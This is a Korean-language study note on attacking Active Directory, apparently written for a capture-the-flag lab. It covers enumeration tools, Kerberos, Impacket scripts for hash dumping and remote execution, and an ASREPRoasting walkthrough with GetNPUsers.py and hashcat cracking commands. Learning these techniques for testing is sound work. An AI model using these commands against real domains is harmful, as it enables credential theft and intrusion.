목표: AD(도메인 환경)에서 사용자, 그룹, 컴퓨터, 권한 구조 등을 수집
BloodHound / bloodhound-pythonrpcclientsmbclientldapsearchenum4linux, crackmapexecGet-ADUser, Get-ADGroupMember, SharpHound, PowerView목표: AD에서 사용되는 인증 프로토콜로, 티켓 기반 인증을 이용해 취약점을 공략
TGT (Ticket Granting Ticket)와 TGS (Service Ticket)을 주고받음목표: 덤프한 해시를 평문 비밀번호로 크랙하여 인증 우회
hashcat (GPU 기반 빠름)john the ripper (CPU 기반)crackstation.txt, rockyou.txt 등 워드리스트 사용hashcat -m 18200 hash.txt rockyou.txt # ASREPRoast용
hashcat -m 13100 hash.txt rockyou.txt # Kerberoast용
목표: 파이썬 기반의 강력한 네트워크 공격/조작 도구 모음
secretsdump.py : 해시 덤프 (LSASS, SAM 등)wmiexec.py, smbexec.py, psexec.py : 원격 명령 실행GetUserSPNs.py : Kerberoasting 대상 SPN 계정 추출ticketer.py, mimikatz.py : 티켓 위조 / PtT 공격 연계목표: Kerberos에서 pre-authentication이 꺼져 있는 사용자의 해시를 덤프하여 크랙
AS-REP 응답이 직접 암호화된 해시로 돌아옴사용자 리스트 확보 (예: GetNPUsers.py, ldapsearch)
ASREPRoasting 수행:
GetNPUsers.py spookysec.local/ -usersfile users.txt -no-pass -dc-ip 10.10.233.27
얻은 해시를 hashcat으로 크랙:
hashcat -m 18200 hash.txt rockyou.txt
| 항목 | 요약 | 핵심 도구 |
|---|---|---|
| AD Enumeration | 도메인 정보 수집 | BloodHound, rpcclient |
| Kerberos | 티켓 기반 인증 프로토콜 | GetUserSPNs.py, 티켓 덤프 |
| Cracking Hashes | 해시 → 평문 크랙 | hashcat, john |
| Impacket | AD/네트워크 침투 도구 모음 | secretsdump.py, smbexec.py |
| ASREPRoasting | pre-auth 없는 계정 해시 크랙 | GetNPUsers.py, hashcat |